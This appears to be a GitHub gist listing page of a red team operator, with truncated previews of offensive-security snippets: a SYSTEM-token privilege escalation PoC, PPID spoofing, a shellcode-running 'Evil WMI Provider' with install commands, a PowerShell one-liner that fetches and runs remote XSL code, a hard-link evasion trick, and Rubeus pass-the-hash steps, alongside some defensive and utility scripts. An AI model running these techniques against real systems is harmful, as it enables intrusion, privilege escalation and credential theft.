Mariusz Banach mgeeky

💭

Wanna sip a sencha?

🔴 Red Team operator. 👾 I live & breath Windows malware. 🛡️ Securing the world by stealing cyber criminals' operation theater and exposing it through code

2.7k followers · 104 following

Binary-Offensive.com
Poland
https://binary-offensive.com
@mariuszbit

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

mgeeky / getsystem_parent.cpp

Created January 25, 2020 01:19 — forked from xpn/getsystem_parent.cpp

A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS

	#include "stdafx.h"

	BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
	TOKEN_PRIVILEGES tp;
	LUID luid;
	TOKEN_PRIVILEGES tpPrevious;
	DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);

	if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;

mgeeky / Get-InjectedThread.ps1

Created February 7, 2020 10:50 — forked from jaredcatkinson/Get-InjectedThread.ps1

Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone

	function Get-InjectedThread
	{
	<#

	.SYNOPSIS

	Looks for threads that were created as a result of code injection.

	.DESCRIPTION

mgeeky / PPID Spoof & BlockDLLs

Created April 30, 2020 21:39 — forked from rasta-mouse/PPID Spoof & BlockDLLs

	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;

	namespace BlockDllTest
	{
	class Program
	{
	static void Main(string[] args)
	{

mgeeky / EvilWMIProvider.cs

Created April 30, 2020 21:40 — forked from TheWover/EvilWMIProvider.cs

Evil WMI Provider

	// Based On LocalAdmin WMI Provider by Roger Zander
	// http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx
	// Adapted For Evil By @subTee
	// Executes x64 ShellCode
	//
	// Deliver and Install dll
	// C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll
	// Invoke calc for SYSTEM level calculations
	// Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode
	// Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null

mgeeky / PowerShell.txt

Created April 30, 2020 21:40

Snippets of PowerShell bypass/evasion/execution techniques that are interesting

	##############################################################################
	### Powershell Xml/Xsl Assembly "Fetch & Execute"
	### [https://twitter.com/bohops/status/966172175555284992]

	$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

	##############################################################################
	### Powershell VBScript Assembly SCT "Fetch & Execute"
	### [https://twitter.com/bohops/status/965670898379476993]

mgeeky / Update_Notes.md

Created April 30, 2020 21:41

You have found THE coolest gist :) Come to DerbyCon to learn more. Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

mgeeky / gist:6adb2c09abcef8d86b2eb0adfcab5692

Created March 21, 2021 16:11 — forked from HarmJ0y/gist:dc379107cfb4aa7ef5c3ecbac0133a02

Over-pass-the-hash with Rubeus and Beacon

	##### IF ELEVATED:

	# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
	beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH

	# decode the base64 blob to a binary .kirbi
	$ base64 -d ticket.b64 > ticket.kirbi

	# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
	beacon> make_token DOMAIN\USER PassWordDoesntMatter

mgeeky / gist:ec8fabcf28678eb99646a10d3752884f

Created April 6, 2021 11:10 — forked from jeffmcjunkin/gist:7b4a67bb7dd0cfbfbd83768f3aa6eb12

Useful Cypher queries for BloodHound

	MATCH (u:User)-[r:AdminTo\|MemberOf*1..]->(c:Computer
	RETURN u.name

	That’ll return a list of users who have admin rights on at least one system either explicitly or through group membership
	---------------

	MATCH
	(U:User)-[r:MemberOf\|:AdminTo*1..]->(C:Computer)
	WITH
	U.name as n,

mgeeky / bh_split2.py

Created May 25, 2021 09:56 — forked from Acebond/bh_split2.py

Split large SharpHound datasets (JSON files) into smaller files that can more easily be imported into BloodHound. Especially useful due to the Electron memory limitations.

	#!/usr/bin/python3
	# Based on https://gist.github.com/deltronzero/7c23bacf97b4b61c7a2f2950ef6f35d8
	# pip install simplejson
	import simplejson
	import sys

	def splitfile(file_name, object_limit):
	print(f"[*] Loading {file_name}")
	with open(file_name) as f:
	data = simplejson.load(f)

mgeeky / Remove-File-Eventually.ps1

Created August 9, 2021 12:55 — forked from marnix/Remove-File-Eventually.ps1

PowerShell command to delete a file, if possible immediately, and if it is in use at the next boot.

-param(
-    [parameter(Mandatory=$true)]
-	[string] $path
-)
-# the code below has been used from
-#    https://blogs.technet.com/b/heyscriptingguy/archive/2013/10/19/weekend-scripter-use-powershell-and-pinvoke-to-remove-stubborn-files.aspx
-# with inspiration from
-#    http://www.leeholmes.com/blog/2009/02/17/moving-and-deleting-really-locked-files-in-powershell/
-# and error handling from

Older Newer